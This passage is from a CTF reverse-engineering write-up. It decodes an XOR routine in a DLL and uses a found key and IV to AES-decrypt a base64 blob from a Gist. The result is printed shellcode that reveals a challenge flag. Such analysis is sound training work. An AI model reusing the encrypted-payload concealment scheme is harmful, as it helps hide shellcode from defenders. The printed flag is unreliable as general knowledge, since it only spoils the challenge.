A quick review within the subroutine finds one small XOR routine that, when cleaned up below, shows that it is just a very simple XOR between the two values.


Knowing that, and having the addresses, you can use whatever method you want to XOR them. I just used a quick IDA Pro script:
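
Outside of IDA, the same operation is a few lines of standalone Python. This is only a sketch: the buffers below are hypothetical stand-ins (the real ones live in the DLL), and repeating the key when it is shorter than the data is my assumption about how the routine behaves.

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR each data byte with the key, repeating the key as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


# Hypothetical values for illustration only.
key = b"example key string"
secret = xor_bytes(b"https://example.invalid/raw", key)
print(xor_bytes(secret, key))
```

XOR is its own inverse, so running the encoded buffer back through the same function with the same key recovers the original bytes.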


The GitHub Gist URL looks interesting. Visiting it shows just a big block of Base64 data that decodes to binary information, as below:

>>> gist_data
'o2WB/eHh3s+SxgR4QUjE9f0yAt4C16oHZvaclKlmBo4K1bsVSbVS2fjxjao/YVUGv7v7Om5xkDjXxARjF6AZalN6pENSgVBQIrYfMq+VeBwwR1whFWRGIC+qulG6HDYmfZt6Va4iljyljxbSnZMrxQwWUXJDhEju2iVzsa1l6nFzoHWO+5+pDV8+sLn3P9jhfZE7qLKVOt7Lm/stSBWZDgzuvqpZziBYo5EumdrISYvWkMm5T2ZD7iRSQaJ3Hr9LUd0nOnfVLW2CyLNmqAM/BKc0f5A9YAoGISmymjc+camULpCiS4WoI8CiyBKOXr5K3CQgx0O9nOn8aS2IU7RreOopH08EGON6DBzkIwbqpC9o28A+wNZsc6cJC0AplIUAafdONBlg/NmcSmkOnPOAR/qhMGMlZKtzEqi4RZDzOfo='
>>> base64.b64decode(gist_data)
b'\xa3e\x81\xfd\xe1\xe1\xde\xcf\x92\xc6\x04xAH\xc4\xf5\xfd2\x02\xde\x02\xd7\xaa\x07f\xf6\x9c\x94\xa9f\x06\x8e\n\xd5\xbb\x15I\xb5R\xd9\xf8\xf1\x8d\xaa?aU\x06\xbf\xbb\xfb:nq\x908\xd7\xc4\x04c\x17\xa0\x19jSz\xa4CR\x81PP"\xb6\x1f2\xaf\x95x\x1c0G\\!\x15dF /\xaa\xbaQ\xba\x1c6&}\x9bzU\xae"\x96<\xa5\x8f\x16\xd2\x9d\x93+\xc5\x0c\x16QrC\x84H\xee\xda%s\xb1\xade\xeaqs\xa0u\x8e\xfb\x9f\xa9\r_>\xb0\xb9\xf7?\xd8\xe1}\x91;\xa8\xb2\x95:\xde\xcb\x9b\xfb-H\x15\x99\x0e\x0c\xee\xbe\xaaY\xce X\xa3\x91.\x99\xda\xc8I\x8b\xd6\x90\xc9\xb9OfC\xee$RA\xa2w\x1e\xbfKQ\xdd\':w\xd5-m\x82\xc8\xb3f\xa8\x03?\x04\xa74\x7f\x90=`\n\x06!)\xb2\x9a7>q\xa9\x94.\x90\xa2K\x85\xa8#\xc0\xa2\xc8\x12\x8e^\xbeJ\xdc$ \xc7C\xbd\x9c\xe9\xfci-\x88S\xb4kx\xea)\x1fO\x04\x18\xe3z\x0c\x1c\xe4#\x06\xea\xa4/h\xdb\xc0>\xc0\xd6ls\xa7\t\x0b@)\x94\x85\x00i\xf7N4\x19`\xfc\xd9\x9cJi\x0e\x9c\xf3\x80G\xfa\xa10c%d\xabs\x12\xa8\xb8E\x90\xf39\xfa'

I tried disassembling, and XOR'ing it, but nothing interesting came out of it. Moving on ...

In that same routine we see two unusual strings being referenced. Unusual as in seemingly random alphanumeric strings of 32 and 16 bytes each.

The 32-byte string, rAcbUUWWNFlqMbruiYOIsAyVQHS78orv, is fed into a subroutine that appears to just initialize some data structures with it. That structure is sent to a second routine along with the 16-byte string, MoJ8C6O4D3asAApB. This second routine is the more interesting one.


Lots and lots of big math. So, either crypto or hashing. Here, I turn to yara4idb, the latest iteration of SignSrch for IDA, and see what signatures it finds:

Rijndael and AES are essentially the same for our purposes, but there is one explicit call out to AES. Following it shows a block of hex that is, indeed, one of the AES S-boxes, verified from a quick web search.


Now the function makes sense. That binary blob from the Gist, a 32-byte string, and a 16-byte string would fit together. Knowing just the basics of encryption suggests that the 32-byte string would be the key (AES-256 uses a 32-byte key) while the 16-byte string would be the IV (it matches the 16-byte AES block size). We can quickly test this:

>>> enc = base64.b64decode(gist_data)
>>> key = b'rAcbUUWWNFlqMbruiYOIsAyVQHS78orv'
>>> iv = b'MoJ8C6O4D3asAApB'
>>> dec = malduck.aes.cbc.decrypt(key, iv, enc)
>>> dec
b'\xfcH\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00AQAPRQVH1\xd2eH\x8bR`>H\x8bR\x18>H\x8bR >H\x8brP>H\x0f\xb7JJM1\xc9H1\xc0\xac<a|\x02, A\xc1\xc9\rA\x01\xc1\xe2\xedRAQ>H\x8bR >\x8bB<H\x01\xd0>\x8b\x80\x88\x00\x00\x00H\x85\xc0toH\x01\xd0P>\x8bH\x18>D\x8b@ I\x01\xd0\xe3\\H\xff\xc9>A\x8b4\x88H\x01\xd6M1\xc9H1\xc0\xacA\xc1\xc9\rA\x01\xc18\xe0u\xf1>L\x03L$\x08E9\xd1u\xd6X>D\x8b@$I\x01\xd0f>A\x8b\x0cH>D\x8b@\x1cI\x01\xd0>A\x8b\x04\x88H\x01\xd0AXAX^YZAXAYAZH\x83\xec AR\xff\xe0XAYZ>H\x8b\x12\xe9I\xff\xff\xff]I\xc7\xc1\x00\x00\x00\x00>H\x8d\x95\xfe\x00\x00\x00>L\x8d\x85%\x01\x00\x00H1\xc9A\xbaE\x83V\x07\xff\xd5H1\xc9A\xba\xf0\xb5\xa2V\xff\xd5flag{225215e04306f6a3c1a59400b054b0df}\x00CONGRATS\x00\x05\x05\x05\x05\x05'

There we have shellcode, and we can fairly easily see "CONGRATS" and the flag.

flag{225215e04306f6a3c1a59400b054b0df}
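
The five trailing \x05 bytes in that output look like PKCS#7 padding left in place by the decryption call. For tidiness, here is a sketch that strips such padding and pulls flag-shaped strings out of a decrypted buffer. Both helpers are my own names, and the 32-hex-digit flag pattern is an assumption based on the flags seen in this CTF.

```python
import re


def pkcs7_unpad(data: bytes, block_size: int = 16) -> bytes:
    """Strip PKCS#7 padding, validating it first."""
    if not data or len(data) % block_size:
        raise ValueError("length is not a multiple of the block size")
    pad = data[-1]
    if pad < 1 or pad > block_size or data[-pad:] != bytes([pad]) * pad:
        raise ValueError("invalid padding")
    return data[:-pad]


def find_flags(data: bytes):
    """Return every flag{...} token of 32 hex digits found in the buffer."""
    return [m.decode("ascii") for m in re.findall(rb"flag\{[0-9a-f]{32}\}", data)]


# Tail of the decrypted buffer shown above (the shellcode bytes before it are omitted).
tail = b"flag{225215e04306f6a3c1a59400b054b0df}\x00CONGRATS\x00\x05\x05\x05\x05\x05"
print(find_flags(tail))
print(pkcs7_unpad(b"A" * 11 + b"\x05" * 5))
```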


A big thanks to the Huntress Labs team for a great set of challenges. There were a few surprises that came up, such as challenge data being hosted on sites that certain countries could not access. There were a few reused challenges where the flags were unfortunately found in Google searches. However, this is not unusual; it is an incredible amount of effort to create this many challenges. Overall, it unfortunately ended like the last seasons of Game of Thrones with a final challenge that stumbled greatly and prevented many, like myself, from finishing. But it was an excellent idea!


We all have our own backgrounds in this industry, career paths, and unique perspectives. Many of my tactics are not the best, or even good, ones. But I hope there are a few techniques here that may interest others.
